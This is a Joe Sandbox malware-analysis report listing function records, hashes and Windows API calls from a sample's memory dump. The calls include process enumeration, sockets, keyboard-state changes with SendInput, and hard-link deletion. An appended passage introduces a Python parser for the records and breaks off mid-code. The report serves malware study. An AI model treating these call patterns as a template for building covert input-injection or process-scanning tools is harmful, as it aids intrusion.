Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 90e63fea606cbde9139752c8d3cff240cf368b64fe326803585f2ed126e9ed51
• Instruction ID: e22318da4bbd7a0f7be5d6421542c6f9f504feb7ea134d441ce3f37a46040312
• Opcode Fuzzy Hash: 90e63fea606cbde9139752c8d3cff240cf368b64fe326803585f2ed126e9ed51
• Instruction Fuzzy Hash: 7A811B71A10109EFCB14DF94C984EEEB7F9FF89315F204598E606AB250DB71AE06DB60
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00B6B10C
• Process32FirstW.KERNEL32(00000000,?), ref: 00B6B11A
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• Process32NextW.KERNEL32(00000000,?), ref: 00B6B1FC
• CloseHandle.KERNEL32(00000000), ref: 00B6B20B
  • Part of subcall function 00AFE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B24D73,?), ref: 00AFE395
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: c80f9d790e12997a94b95af97cf308e845f5c2d676d8f44815df78947185b9fc
• Instruction ID: 336e04fe9b5d71c34e63ac43d756909c5ad8e731cfe07d65dcb4374b44360162
• Opcode Fuzzy Hash: c80f9d790e12997a94b95af97cf308e845f5c2d676d8f44815df78947185b9fc
• Instruction Fuzzy Hash: 265147B1908340AFC310EF25C986A6BBBF8FF89754F40496DF58997291EB70D905CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d31ea5d410ed98808a597eac10feb16ea8c6504279aa6cc3c34a15fb0519d26
                                                                                                                                                                                                                                                                                    • Instruction ID: 602ed04405e88691185c3f0183efd5688064c334c9c53be489e3982c2af14d66
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d31ea5d410ed98808a597eac10feb16ea8c6504279aa6cc3c34a15fb0519d26
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63412B71A00121AADB306FBDACC2ABF3AE4EF61730F140AE5F41CDA2E1DB354D418261
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00B6255A
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B62568
                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B625E7
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B625F1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ac83f18647a2a69e2d6f1e707907317478c2fef0cebe9982fbd0d35d2285ee2f
                                                                                                                                                                                                                                                                                    • Instruction ID: ea045ab2e8296402bda66bef139b43d03da90f857a41d6c496ab584e27c8a3fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac83f18647a2a69e2d6f1e707907317478c2fef0cebe9982fbd0d35d2285ee2f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A041D334A00600AFE720AF24C996F2A77E5EF04758F54C488F91A8F2D2C776ED428B91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B76D1A
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B76D4D
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B76DBA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 96155a165f79a66ca1ed2452f73f8d32e19ce1c860e32c4b2157f862c19a5f58
                                                                                                                                                                                                                                                                                    • Instruction ID: 56b292be897b5132587e0963a0bddb1c220263004806b33f2b30b9e91f4971cc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96155a165f79a66ca1ed2452f73f8d32e19ce1c860e32c4b2157f862c19a5f58
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6510F74A00605EFCF25DF64D980AAE7BF6FF44360F1085A9F96997290DB70AE81CB50
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: dba0946c393416b4b4e9bf04a680ea4c9216e0d006a3e357098de72ef463c43b
                                                                                                                                                                                                                                                                                    • Instruction ID: 68743b9a95d722e1d98aca935bc9f6e835b7c6f5c61ddaece12b576a36b328f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dba0946c393416b4b4e9bf04a680ea4c9216e0d006a3e357098de72ef463c43b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C741D771A00704EFD725AF78CC41FAA7BE9EB84B10F1086AAF115DB691D77299418780
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B561C8
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B561EE
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B56213
                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B5623F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B4B473
• SetKeyboardState.USER32(00000080), ref: 00B4B48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B4B4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B4B54F
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B4B5B8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00B4B5D4
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00B4B63B
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B4B68D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• ClientToScreen.USER32(?,?), ref: 00B780D4
• GetWindowRect.USER32(?,?), ref: 00B7814A
• PtInRect.USER32(?,?,?), ref: 00B7815A
• MessageBeep.USER32(00000000), ref: 00B781C6
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetForegroundWindow.USER32 ref: 00B72187
  • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
  • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
  • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
• GetCaretPos.USER32(?), ref: 00B7219B
• ClientToScreen.USER32(00000000,?), ref: 00B721E8
• GetForegroundWindow.USER32 ref: 00B721EE
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
• _wcslen.LIBCMT ref: 00B4E8E2
• _wcslen.LIBCMT ref: 00B4E8F9
• _wcslen.LIBCMT ref: 00B4E924
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B4E92F
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
APIs
  • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
• GetCursorPos.USER32(?), ref: 00B79A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B79A72
• GetCursorPos.USER32(?), ref: 00B79ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00B79AF0
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
• GetFileAttributesW.KERNEL32(?,00B7DC30), ref: 00B4DBA6
• GetLastError.KERNEL32 ref: 00B4DBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4DBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B7DC30), ref: 00B4DC21
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00B732A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B732C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B732CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B732DC
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?), ref: 00B496F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrcpyW.KERNEL32(00000000,?,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B49719
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B496E4: lstrcmpiW.KERNEL32(00000000,?,00B48271,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?), ref: 00B4974A
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B4828A
                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482B0
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482EB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                    • Opcode ID: 442ed80ba28c0caa79805141aaf72ca8e74d80ee8785b258a3f794943a92e4ed
                                                                                                                                                                                                                                                                                    • Instruction ID: d86155f2c07648f23a180c73a64d18770ec34fdb435f0643ea982f984cb7aedc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 442ed80ba28c0caa79805141aaf72ca8e74d80ee8785b258a3f794943a92e4ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11263A200342ABCB14AF38C844E7E77F9FF45750B50406AF906C72A0EF719A01E794
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B7615A
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B7616C
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B76177
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B762B5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1405b26149bd70bb52a86f115e7384590fe2c5ca2c5e835d92230f772a076019
                                                                                                                                                                                                                                                                                    • Instruction ID: 300d2688f3fb5003d54dbd7c0c3186a0072d61258dd9c7314d7a5f1407b677f3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1405b26149bd70bb52a86f115e7384590fe2c5ca2c5e835d92230f772a076019
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3511847550061896DB20DF648CC4EEF7BFCEF15354B1081AAFA2DE6081EBB0C944CB61
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 87e1c30e7668e76f1763521c01317e0cc8d9eda29b98ccb56b75c11bc28f16b4
                                                                                                                                                                                                                                                                                    • Instruction ID: 686dbfdc827e34e985129e72a1bd7104c65117ba74c3d23e7878295a949ee19e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87e1c30e7668e76f1763521c01317e0cc8d9eda29b98ccb56b75c11bc28f16b4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37018FB22092167EE6212778ACC5FA7679DDF853B8BB007B5B521A12D1DE608DE08160
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B42394
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B423D7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 559727f9aa03d5c13bf4fce853d1706b5b5e57359a389609e5bd1f038d9790a6
                                                                                                                                                                                                                                                                                    • Instruction ID: e5640df32d385ed449f9b2312047366d55591044d4cd7d96d91885437514331a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 559727f9aa03d5c13bf4fce853d1706b5b5e57359a389609e5bd1f038d9790a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4911F73A900218FFEB119FA5CD85F9DBBB8EB08750F600091EA01B7290D6716F50EB98
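The function records above are a flat list of "name.MODULE(args), ref: ADDR" lines, which is awkward to triage by hand once a report runs to thousands of functions. The script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses those records into structured call entries, separates direct calls from the "Part of subcall function" entries, pulls out the literal string arguments (the "cdecl" that Joe lists as the record's String ID), and decodes the SendMessageW message numbers seen on this page into their Windows SDK names (EM_GETSEL, EM_LINEFROMCHAR, LVM_GETIMAGELIST, LVM_SETCOLUMNW). The sample text is a constructed transcript of two records from this page; the line format is inferred from the report and is an assumption.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox report.

Added example; not code from the report or from Joe Security. SAMPLE is a
constructed transcript of records visible on this page; the record line
format is inferred from the report. Message constants come from the
Windows SDK headers (winuser.h, commctrl.h).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: two records transcribed from this report (bullets and
# the "Part of subcall function" indentation kept as printed).
SAMPLE = """\
APIs
  • Part of subcall function 00B496E4: lstrlenW.KERNEL32(?,00000002,000000FF,?), ref: 00B496F3
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B4828A
• lstrcpyW.KERNEL32(00000000,?,?,00B490BB,00000000,?,0000001C,?,?,00000000), ref: 00B482B0
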